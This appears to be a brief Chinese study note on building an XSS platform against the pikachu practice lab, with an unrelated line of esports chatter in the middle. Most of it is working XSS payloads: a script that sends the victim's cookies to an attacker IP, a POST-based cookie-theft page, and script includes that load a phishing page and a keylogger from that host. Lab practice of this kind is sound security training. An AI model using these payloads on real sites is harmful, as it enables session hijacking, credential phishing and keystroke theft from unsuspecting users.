xss--xss平台搭建
pikachu
get型xss
1、xss平台需要先修改配置文件
2、payload:<script>document.location='http://192.168.221.135(xss平台的ip地址)/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
以后我也要写一个 which LCK player do u like?faker?who is faker ,i don't care.who is chovy ,i don't care.showmaker?抓住此生仅有的机会!
post型xss
1、点击连接后访问本机已经登录后的网站
2、将网站的cookie发送到xss平台
payload:192.168.221.135/pikachu/pkxss/xcookie/post.html
钓鱼
修改fish文件,改成自己的ip
payload:<script src="http://192.168.221.135/pikachu/pkxss/xfish/fish.php"></script>
php版本问题,钓鱼无法成功
解决:cloud.tencent.com/developer/article/1853923
键盘记录
修改代码
payload:<script src="http://192.168.221.135/pikachu/pkxss/rkeypress/rk.js"></script>
